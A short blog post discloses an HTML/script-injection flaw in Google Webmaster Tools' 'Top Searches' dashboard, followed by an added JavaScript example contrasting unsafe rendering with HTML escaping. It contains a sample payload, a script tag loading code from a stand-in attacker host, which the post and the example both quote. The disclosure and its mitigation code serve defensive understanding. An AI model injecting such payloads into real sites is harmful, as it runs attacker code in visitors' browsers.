Google Webmaster Tools Vulnerability

Sep 10, 09

There is a vulnerability in Google Webmaster Tools that allows carefully crafted searches to inject arbitrary HTML content into the "Top Searches" dashboard. In the image below, an <hr /> element has been injected, but the HTML string could have been a script tag intended to breach the privacy of unsuspecting website owners.



If a number of people were to perform a Google search for <script src="http://hacker.com/bad.js"></script>, a site owner who loads the Webmaster Tools "Top Searches" page would unknowingly also be running the referenced script.
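The flaw described above comes down to a search query being written into the dashboard's HTML without output encoding. The following is an added example, not code from Google or from the original post; the function names and the sample rows are hypothetical and constructed for illustration.

```javascript
// Added example: escapeHtml, renderTopSearchesUnsafe, renderTopSearches and
// containsInjectedMarkup are hypothetical names, not taken from Webmaster Tools.

// Constructed sample data: query strings as a search report might list them.
const sampleQueries = [
  { query: 'coffee pubs waterloo', count: 42 },
  { query: '<hr />', count: 17 },
  { query: '<script src="http://hacker.com/bad.js"></script>', count: 9 },
];

// Vulnerable pattern: the query is concatenated into markup as-is,
// so any tags it contains become part of the page.
function renderTopSearchesUnsafe(rows) {
  return rows
    .map((r) => `<tr><td>${r.query}</td><td>${r.count}</td></tr>`)
    .join('\n');
}

// Encode the characters that are significant in HTML text and quoted
// attribute values. One pass over the input, so nothing is double-encoded.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Hardened pattern: every untrusted field is encoded at the point of output.
function renderTopSearches(rows) {
  return rows
    .map((r) => `<tr><td>${escapeHtml(r.query)}</td><td>${escapeHtml(r.count)}</td></tr>`)
    .join('\n');
}

// Demonstration check: does the output contain any live tag other than the
// <tr>/<td> markup the template itself emits?
function containsInjectedMarkup(html) {
  const tags = html.match(/<\/?([a-z][a-z0-9]*)\b/gi) || [];
  return tags.some((t) => !/^<\/?(tr|td)$/i.test(t));
}

console.log(renderTopSearchesUnsafe(sampleQueries));
console.log(renderTopSearches(sampleQueries));
```

With encoding applied, the `<hr />` and script queries show up in the table as literal text instead of being parsed as elements.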


These types of oversights are common on the web, but I would have thought Google would be more careful!


About Jason Miller:

I am a JavaScript developer from Waterloo, Ontario, Canada. When I am not typing green code onto a black screen, you might find me at the nearest coffee pub checking out the brew. I run an internet firm called developIT and maintain blogs and web apps when I can.